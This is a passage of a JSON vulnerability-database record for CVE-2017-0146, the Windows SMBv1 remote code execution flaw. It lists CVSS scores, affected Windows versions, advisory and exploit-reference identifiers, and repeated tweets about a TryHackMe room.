"MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-02-05T13:14:20", "rev": 2, "value": 9.5, "vector": "NONE"}}, "hash": "f9f54f2c110b54b5720d5c097976e287d419c3e25dacc91adea32f2181fdcae9", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "26cf6424f2bdd76a83a3a196b3158794", "key": "references"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2020-02-05T13:14:20", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 39}, "differentElements": ["cpe23", "affectedSoftware"], "edition": 3, "lastseen": "2020-02-05T13:14:20"}, {"bulletin": {"affectedSoftware": [{"name": "microsoft server_message_block", "operator": "eq", "version": "1.0"}], "bulletinFamily": "NVD", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "cpe23": [], "cvelist": ["CVE-2017-0146"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cwe": ["CWE-20"], "description": "The SMBv1 server in Microsoft Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; and Windows Server 2016 allows remote attackers to execute arbitrary code via crafted packets, aka \"Windows SMB Remote Code Execution Vulnerability.\" This vulnerability is different from those described in CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, and CVE-2017-0148.", "edition": 2, "enchantments": {"dependencies": {"modified": "2019-10-04T12:18:44", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["SMNTC-96707"], "type": "symantec"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS17_010"], "type": "canvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MS:CVE-2017-0146"], "type": "mscve"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2019-10-04T12:18:44", "value": 9.5, "vector": "NONE"}}, "hash": "f1e22936f8b4db8def8a883b3a60ecea04bb8772cd8c259269d6c29ae23f1de7", "hashmap": [{"hash": "732a831a7eed3955e8de18b2d8903bc8", "key": "cvss3"}, {"hash": "cde40a13c5d43ca610b08893c2bdb748", "key": "cvelist"}, {"hash": "f54a01beedb777f2ca261ddba30cf1a5", "key": "published"}, {"hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286", "key": "description"}, {"hash": "226da5129ffaaee3d5b48e506b957d58", "key": "cwe"}, {"hash": "a173072793578541ea04b7baa0323592", "key": "cpe"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "90d3da5cc0f990156ba985c80c37d178", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe23"}, {"hash": "1716b5fcbb7121af74efdc153d0166c5", "key": "type"}, {"hash": "bcbed719525ad6e957360150b20c3c47", "key": "affectedSoftware"}, {"hash": "e8dbb4c019811b96da3443b871bd4b26", "key": "cvss2"}, {"hash": "601892ece72be3be2f57266ca2354792", "key": "bulletinFamily"}, {"hash": "d68798550042e5272198c20ea65d8f01", "key": "modified"}, {"hash": "c5b620836fe37bc62cedfa2b86a05563", "key": "references"}, {"hash": "444c2b4dda4a55437faa8bef1a141e84", "key": "reporter"}, {"hash": "d1b2ee04e6815071fc75b496057c9a52", "key": "title"}], "history": [], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0146", "id": "CVE-2017-0146", "lastseen": "2019-10-04T12:18:44", "modified": "2018-06-21T01:29:00", "objectVersion": "1.3", "published": "2017-03-17T00:59:00", "references": ["http://www.securityfocus.com/bid/96707", "http://www.securitytracker.com/id/1037991", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "https://www.exploit-db.com/exploits/41891/", "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "https://www.exploit-db.com/exploits/43970/", "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "https://www.exploit-db.com/exploits/41987/", "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"], "reporter": "cve@mitre.org", "title": "CVE-2017-0146", "type": "cve", "viewCount": 21}, "differentElements": ["references"], "edition": 2, "lastseen": "2019-10-04T12:18:44"}], "edition": 7, "hashmap": [{"key": "affectedConfiguration", "hash": "dd4a1fba31e29c6988f563bdeb65c80c"}, {"key": "affectedSoftware", "hash": "e758f8fa39ce9e8de2ffe527ec8b6423"}, {"key": "bulletinFamily", "hash": "601892ece72be3be2f57266ca2354792"}, {"key": "cpe", "hash": "a173072793578541ea04b7baa0323592"}, {"key": "cpe23", "hash": "0751f4e56f29adf827144e01a128331d"}, {"key": "cpeConfiguration", "hash": "6ac681e59932d7c840205e984b11bad5"}, {"key": "cvelist", "hash": "cde40a13c5d43ca610b08893c2bdb748"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "cwe", "hash": "226da5129ffaaee3d5b48e506b957d58"}, {"key": "description", "hash": "bf11cde0d5ceb8e4aedc6a3dd6d89286"}, {"key": "extraReferences", "hash": "b8e67c0bcb3b33cda93643b9d21f6fe8"}, {"key": "href", "hash": "90d3da5cc0f990156ba985c80c37d178"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "d68798550042e5272198c20ea65d8f01"}, {"key": "published", "hash": "f54a01beedb777f2ca261ddba30cf1a5"}, {"key": "references", "hash": "26cf6424f2bdd76a83a3a196b3158794"}, {"key": "reporter", "hash": "029dfc07c499dc142a429cac0a029e99"}, {"key": "title", "hash": "d1b2ee04e6815071fc75b496057c9a52"}, {"key": "type", "hash": "1716b5fcbb7121af74efdc153d0166c5"}], "hash": "2fc4b2321f3a5f242d4224df89b5870212d7472edfecba252d17e70bdefecebe", "viewCount": 103, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "symantec", "idList": ["SMNTC-96707"]}, {"type": "saint", "idList": ["SAINT:8F97D6443E5FED252FF64CE37A74709D", "SAINT:2D677AA07C3BC24D8037E937830ACA0D"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0146"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "canvas", "idList": ["MS17_010"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142548"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA10977", "KLA11902"]}, {"type": "nessus", "idList": ["700059.PRM", "MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-04-23T00:07:42", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}], "modified": "2021-04-23T00:07:42"}, "score": {"value": 9.5, "vector": "NONE", "modified": "2021-04-23T00:07:42", "rev": 2}, "twitter": {"counter": 86, "tweets": [{"link": "https://twitter.com/lgzey_/status/1421728043740114946", "text": "Blue - I have just completed this room! Check it out: https://t.co/iW6j8GbVcc?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/RonnyArias/status/1422356892483981314", "text": "Blue - I have just completed this room! Check it out: https://t.co/TJq1bBTWoK?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/QuentinCasares/status/1422521751523762177", "text": "Blue - I have just completed this room! Check it out: https://t.co/0l0HtT6bML?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/shadow44406573/status/1423260611429998593", "text": "Blue - I have just completed this room! Check it out: https://t.co/sijYaXhkoQ?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/top_wizard/status/1423289010630270995", "text": "Blue - I have just completed this room! Check it out: https://t.co/1ICOkz0X0h?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/InfoSec_MBE/status/1425558031790657546", "text": "Blue - I have just completed this room! Check it out: https://t.co/Tms9b4JF84?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/uk_NJx/status/1426573521308762112", "text": "Blue - I have just completed this room! Check it out: https://t.co/B1WGZBexHA?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/carlos_o_m/status/1426612611009892352", "text": "Blue - I have just completed this room! Check it out: https://t.co/6jaCHwnUja?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click a trav\u00e9s de /RealTryHackMe"}, {"link": "https://twitter.com/AynRandSucks/status/1429439489068306434", "text": "Blue - I have just completed this room! Check it out: https://t.co/Ypt3f3Ra8A?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click via /RealTryHackMe"}, {"link": "https://twitter.com/0x6d61/status/1430147082573074436", "text": "Blue - I have just completed this room! Check it out: https://t.co/08xRz1yFx7?amp=1 /hashtag/tryhackme?src=hashtag_click /hashtag/windows?src=hashtag_click /hashtag/eternal?src=hashtag_click blue # MS17-010 # CVE2017-0144 # CVE-2017-0145 # CVE-2017-0146 /hashtag/CVE?src=hashtag_click-2017-0147 /hashtag/CVE?src=hashtag_click-2017-0148 /hashtag/SMB?src=hashtag_click /hashtag/CVE?src=hashtag_click-2017-0143 /hashtag/video?src=hashtag_click /hashtag/blue?src=hashtag_click /RealTryHackMe\u3088\u308a"}], "modified": "2021-04-23T00:07:42"}}, "objectVersion": "1.5", "cpe": ["cpe:/a:microsoft:server_message_block:1.0"], "affectedSoftware": [{"cpeName": "microsoft:server_message_block", "name": "microsoft server message block", "operator": "eq", "version": "1.0"}], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "cpe23": ["cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*"], "cwe": ["CWE-20"], "scheme": null, "affectedConfiguration": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2008", "name": "microsoft windows server 2008", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_7", "name": "microsoft windows 7", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "*"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1511"}, {"cpeName": "microsoft:windows_vista", "name": "microsoft windows vista", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"children": [{"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:a:microsoft:server_message_block:1.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true}], "operator": "OR"}, {"children": [], "cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_vista:-:sp2:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:gold:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": false}], "operator": "OR"}], "cpe_match": [], "operator": "AND"}]}, "extraReferences": [{"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-966341.pdf"}, {"name": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf", "refsource": "CONFIRM", "tags": [], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-701903.pdf"}, {"name": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", "refsource": "MISC", "tags": [], "url": "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02"}, {"name": "41987", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41987/"}, {"name": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146", "refsource": "CONFIRM", "tags": ["Patch", "Vendor Advisory"], "url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0146"}, {"name": "41891", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/41891/"}, {"name": "43970", "refsource": "EXPLOIT-DB", "tags": [], "url": "https://www.exploit-db.com/exploits/43970/"}, {"name": "1037991", "refsource": "SECTRACK", "tags": [], "url": "http://www.securitytracker.com/id/1037991"}, {"name": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/156196/SMB-DOUBLEPULSAR-Remote-Code-Execution.html"}, {"name": "96707", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/96707"}, {"name": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html", "refsource": "MISC", "tags": [], "url": "http://packetstormsecurity.com/files/154690/DOUBLEPULSAR-Payload-Execution-Neutralization.html"}], "immutableFields": []}], "symantec": [{"id": "SMNTC-96706", "hash": "4775340a56904225cdfe843f51e931b56b1c55ac96997708a86791f811c0acb3", "type": "symantec", "bulletinFamily": "software", "title": "Microsoft Windows SMB Server CVE-2017-0148 Remote Code Execution Vulnerability", "description": "### Description\n\nMicrosoft Windows is prone to a remote code-execution vulnerability. Successful exploits will allow an attacker to execute arbitrary code on the target system. Failed attacks will cause denial of service conditions.\n\n### Technologies 